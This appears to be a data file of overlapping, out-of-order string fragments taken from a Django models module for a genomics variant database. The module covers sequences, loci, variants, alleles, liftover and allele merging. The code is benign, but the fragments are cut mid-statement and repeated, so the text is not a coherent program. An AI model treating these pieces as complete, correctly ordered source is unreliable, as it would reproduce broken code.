"subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self):",
"no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs",
"Locus for a given chrom/position/ref per database (handled via insertion queues) \"\"\" contig",
"f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge =",
"self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass from",
"queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE)",
"force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20): if len(s)",
"flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool",
"\"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def",
"set on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self):",
"alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt",
"def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref)",
"regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate,",
"g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple",
"= models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash =",
"ClinGen) - but it's not likely. It's a bug to have the same",
"= models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message =",
"not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str,",
"count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\"",
"using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20): if len(s) >",
"merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele:",
"for a given locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT =",
"allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie GRCh37",
"if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise ValueError(f'Could",
"== self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard",
"get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource,",
"def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at",
"len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod",
"models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None,",
"Variants with different alt alleles point to the same locus) There is only",
"\"ref\") @property def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model):",
"\"\"\" Provides a source of alleles for liftover pipelines. \"\"\" objects = InheritanceManager()",
"def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model):",
"if got a variant but invalid error_message = models.TextField() class Meta: unique_together =",
"from django.contrib.auth.models import User from django.db import models, IntegrityError from django.db.models import Value",
"find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']:",
"= models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class",
"allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele)",
"invalid error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self): return",
"as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) !=",
"alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for",
"False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool,",
"dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq)",
"Allele (may not have been possible to retrieve in all builds, but at",
"if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq)",
"= models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance",
"def start(self): return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod",
"\"\"\" A set of variants - usually used as a cached result \"\"\"",
"models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self): return f\"{self.allele} failed {self.liftover}:",
"__str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles at",
"= models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def",
"1 alts pointing to the same locus for the row) There is only",
"Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def",
"FilteredRelation from django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel",
"give error of: \"index row requires x bytes, maximum size is 8191\" The",
"contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if",
"models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant",
"f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec == 'CA' and",
"import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel",
"VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele",
"string in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"),",
":param liftover_complete: If False does not check for missing representations \"\"\" if liftover_complete:",
"not best_attempt: raise ValueError(f'Could not find a variant in allele {self.id} for build",
"== alt or alt == '.' @property def is_reference(self) -> bool: return self.alt.seq",
"import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from",
"self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal,",
"is standard [GATCN] (ie not special or reference) \"\"\" # locus.ref should always",
"models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error class Meta: unique_together",
"\"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt,",
"-> VariantCoordinate: \"\"\" regex_pattern - has to have 4 groups, returns (chrom, position,",
"None g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY",
"solution is to md5sum seq and make the constraint on that. Another possible",
"ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN =",
"= models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\")",
"library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models",
"must have already been created - allele_source used to retrieve them The VCF",
"Set import django.dispatch from django.conf import settings from django.contrib.auth.models import User from django.db",
"(ref + >= 1 alts pointing to the same locus for the row)",
"VCF file (multiple Variants with different alt alleles point to the same locus)",
"have already been created - allele_source used to retrieve them The VCF (in",
"on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices)",
"reading through a VCF where ID is set to Allele.pk and then creating",
"get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the",
"know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import",
"settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry if server was down",
"\"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig,",
"slow (API call) If you know a VariantAllele exists for your build, use",
"-> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if",
"self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38)",
"allele_source used to retrieve them The VCF (in genome_build build) is set in",
"if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry if server was",
"def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if",
"def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True)",
"BtreeGistExtension to add via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True)",
"Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\",",
"def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool:",
"def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return",
"them The VCF (in genome_build build) is set in UploadedFile for the UploadPipeline",
"+ F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs,",
"(so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)",
"def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants",
"except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params",
"otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) ->",
"end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr):",
"for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig",
"Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}:",
"being represented by 1 loci in the build being used by ClinGen) -",
"re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in a VCF file (multiple",
"library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele",
"per database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position =",
"-> str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\"",
"force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using,",
"Usually 2+ per line in a VCF file (ref + >= 1 alts",
"only expect to store Alleles for a small fraction of Variants So don't",
"error of: \"index row requires x bytes, maximum size is 8191\" The easiest",
"Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va",
"page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def",
"logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant)",
"exists with allele/build/variant of %s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant) va.delete()",
"models.Model): \"\"\" Genome build independent - ie GRCh37 and GRCh38 variants for same",
"REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta:",
"Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have 4 groups,",
"# handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides",
"\"\"\" This is called at the end of a liftover pipeline (once per",
"dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs:",
"None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return",
"self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return",
"@lazy def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error",
"va.variant raise ValueError(f'Could not find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build:",
"one # links there, and can't have another, so it'll work) other_allele.clingen_allele =",
"def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return",
"V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom,",
"sometimes that can fail. Linked against Variant with VariantAllele below \"\"\" clingen_allele =",
"\"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) ->",
"different alt alleles point to the same locus) There is only 1 Locus",
"= re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"])",
"~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must match",
"from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from django.urls.base import reverse",
"return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles at a",
"{self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE)",
"go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]:",
"got a variant but invalid error_message = models.TextField() class Meta: unique_together = ('liftover',",
"For others (NCBI Remap) we need to write the source genome build VCF",
"error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(),",
"\"\"\" regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt)",
"called at the end of a liftover pipeline (once per build) \"\"\" pass",
"per database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus,",
"\"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together =",
"Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref,",
"(multiple Variants with different alt alleles point to the same locus) There is",
"variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool",
"genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple,",
"= self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of",
"allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument",
"position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt)",
"str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele:",
"# Some builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds)",
"q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N",
"must match and variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs =",
"FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} !=",
"variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups()",
"def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the end of a",
"there is one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def",
"Return a \"1:123321 G>C\" style string in a query \"\"\" kwargs = {name:",
"Another possible solution is to use Gist indexes but that requires installing the",
"not likely. It's a bug to have the same 3 variant/build/allele so we",
"add that unique_together constraint We only expect to store Alleles for a small",
"from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the other",
"(ie not special or reference) \"\"\" # locus.ref should always be standard... return",
"of a liftover pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele =",
"from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin,",
"import re from typing import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from",
"need to write the source genome build VCF first Alleles must have already",
"other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele =",
"__str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs =",
"default uses indexes for constraints, and large TextFields give error of: \"index row",
"in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod",
"3 variant/build/allele so we can add that unique_together constraint We only expect to",
"represented by 1 loci in the build being used by ClinGen) - but",
"models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model):",
"for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF",
"-> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self)",
"AlleleRegistry) we can write the VCF in the desired genome build For others",
"def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF",
"max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt",
"self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool,",
"locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref ==",
"AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None",
"from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from",
"null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if there is one, otherwise",
"on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build",
"RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status",
"models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self):",
"- has to have 4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple",
"try: va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with",
"VCF (in genome_build build) is set in UploadedFile for the UploadPipeline \"\"\" user",
"return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool:",
"at a locus Usually 2+ per line in a VCF file (ref +",
"by to write VCF coordinates during liftover. Can be slow (API call) If",
"allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build =",
"return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\"",
"VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs =",
"format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt",
"allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\")",
"= [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) ->",
"is set to Allele.pk and then creating VariantAllele entries for the variant/allele Some",
"for a small fraction of Variants So don't want them on the Variant",
"self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self)",
"django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from django.urls.base import reverse from",
"def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c",
"\"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1,",
"there is one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy",
"class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the same genome build",
"other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists",
"= models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self): return f\"{self.allele} failed",
"alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom):",
"and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT",
"= collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\" We want to guarantee",
"user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele",
"@property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele: return [self]",
"in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return",
"AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE)",
"can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return",
"constraints) Postgres by default uses indexes for constraints, and large TextFields give error",
"= \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build}",
"locus Usually 2+ per line in a VCF file (ref + >= 1",
"@property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) ->",
"flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of",
"start(self): return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def",
"VCF where ID is set to Allele.pk and then creating VariantAllele entries for",
"other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe)",
"va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError:",
"canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error:",
"= None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self):",
"# locus.ref should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool:",
"using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod",
